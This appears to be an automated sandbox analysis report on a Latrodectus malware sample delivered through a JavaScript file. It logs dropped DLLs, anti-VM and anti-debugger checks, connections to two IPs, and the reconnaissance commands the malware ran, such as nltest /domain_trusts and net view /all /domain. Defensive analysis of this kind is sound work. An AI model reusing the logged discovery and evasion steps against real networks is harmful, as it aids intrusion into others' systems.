Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\rundll32.exe

Code function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection,

6_2_00000001800655A8

Contains functionality to detect sleep reduction / modifications

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049AEC

6_2_0000000180049AEC

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	6_2_00000187EC8568E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	6_2_00000187EC857FA8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	7_2_00000201DAAE7FA8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	7_2_00000201DAAE68E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	8_2_000001A3795068E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	8_2_000001A379507FA8

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 807			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 8931			Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Dropped PE file which has not been started: :wtfbbq (copy)	Jump to dropped file
Source: C:\Windows\System32\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\sharepoint\360total.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3AAC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3A4C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3A7C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI39EE.tmp	Jump to dropped file

Source: C:\Windows\Installer\MSI3B6A.tmp

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_4-33699

Source: C:\Windows\Installer\MSI3B6A.tmp	API coverage: 7.4 %
Source: C:\Windows\System32\rundll32.exe	API coverage: 1.6 %
Source: C:\Windows\System32\rundll32.exe	API coverage: 8.4 %

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049AEC

6_2_0000000180049AEC

Source: C:\Windows\System32\wscript.exe TID: 380	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 6540	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4724	Thread sleep count: 261 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4724	Thread sleep time: -261000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 5812	Thread sleep count: 807 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 5812	Thread sleep time: -80700s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4724	Thread sleep count: 8931 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4724	Thread sleep time: -8931000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0072AF79 FindFirstFileExW,	4_2_0072AF79
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	6_2_00000187EC85A350
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC851A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	6_2_00000187EC851A08
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAEA350 FindFirstFileW,FindNextFileW,LoadLibraryW,	7_2_00000201DAAEA350
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	7_2_00000201DAAE1A08
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_000001A37950A350
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379501A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_000001A379501A08

Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW7
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA918000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MWrod_VMware_SATA_CD00#4&224f42ef&
Source: wscript.exe, 00000000.00000003.2049218463.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2040729475.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048754066.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046212474.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2158447349.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049827134.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2158447349.00000207B53F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048245243.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA956000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000007.00000002.3337300936.00000201DCA70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No

Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_006FD0A5 IsDebuggerPresent,OutputDebugStringW,

4_2_006FD0A5

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,

6_2_0000000180066C3C

Source: C:\Windows\System32\rundll32.exe

6_2_00000001800033E0

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0072AD78 mov eax, dword ptr fs:[00000030h]		4_2_0072AD78
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00722DCC mov ecx, dword ptr fs:[00000030h]		4_2_00722DCC

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_006F2310 GetProcessHeap,

4_2_006F2310

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_007133A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_007133A8
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071353F SetUnhandledExceptionFilter,	4_2_0071353F
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00712968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00712968
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00716E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00716E1B
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0000000180070760
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_000000018006F6E0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 104.21.59.82 443			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 172.67.136.103 443			Jump to behavior

JavaScript file contains Antivirus product strings

Source: Document_a19_79b555791-28h97348k5477-3219g9.js

Initial file: avast, eset, sophos

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_006F52F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,GetProcessId,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,

4_2_006F52F0

Source: C:\Windows\Installer\MSI3B6A.tmp	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle,

6_2_000000018004A650

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,

6_2_0000000180049278

Source: Update_3b24da5a.dll.6.dr	Binary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
Source: rundll32.exe	Binary or memory string: Progman
Source: rundll32.exe	Binary or memory string: Program manager

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_007135A9 cpuid

4_2_007135A9

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: EnumSystemLocalesW,	4_2_0072E0C6
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: EnumSystemLocalesW,	4_2_00727132
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: EnumSystemLocalesW,	4_2_0072E111
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: EnumSystemLocalesW,	4_2_0072E1AC
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_0072E237
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoEx,	4_2_007123F8
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoW,	4_2_0072E48A
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_0072E5B3
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoW,	4_2_0072E6B9
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoW,	4_2_007276AF
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_0072E788
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	4_2_0072DE24

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_007137D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_007137D5

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_00000187EC858AE0 GetUserNameA,wsprintfA,

6_2_00000187EC858AE0

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_00727B1F GetTimeZoneInformation,

4_2_00727B1F

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress,

6_2_0000000180040CB0

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: rundll32.exe	Binary or memory string: 360tray.exe
Source: rundll32.exe	Binary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: rundll32.exe	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe

Stealing of Sensitive Information

Yara detected Latrodectus

Source: Yara match	File source: 6.2.rundll32.exe.187ec850000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4f00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4ef0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec840000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201da900000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a379500000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201da900000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201daae0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a3794f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a379500000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec840000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec850000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a3794f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201daae0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4f00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.3125138531.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3337063134.00000201DAAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2157690960.000001A379500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3003737067.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2138417852.00000187EC840000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3336769043.00000201DA900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3044326122.00000201DC500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3337150671.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2810393919.000001FFB4F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3252768479.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2810366627.000001FFB4EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3336481433.000000D2043F8000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2157667357.000001A3794F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4012, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected Latrodectus

Source: Yara match	File source: 6.2.rundll32.exe.187ec850000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4f00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4ef0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec840000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201da900000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a379500000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201da900000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201daae0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a3794f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a379500000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec840000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec850000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a3794f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201daae0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4f00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.3125138531.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3337063134.00000201DAAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2157690960.000001A379500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3003737067.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2138417852.00000187EC840000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3336769043.00000201DA900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3044326122.00000201DC500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3337150671.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2810393919.000001FFB4F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3252768479.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2810366627.000001FFB4EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3336481433.000000D2043F8000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2157667357.000001A3794F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4012, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	22 Scripting	1 Valid Accounts	121 Windows Management Instrumentation	22 Scripting	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	1 Replication Through Removable Media	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	3 Obfuscated Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
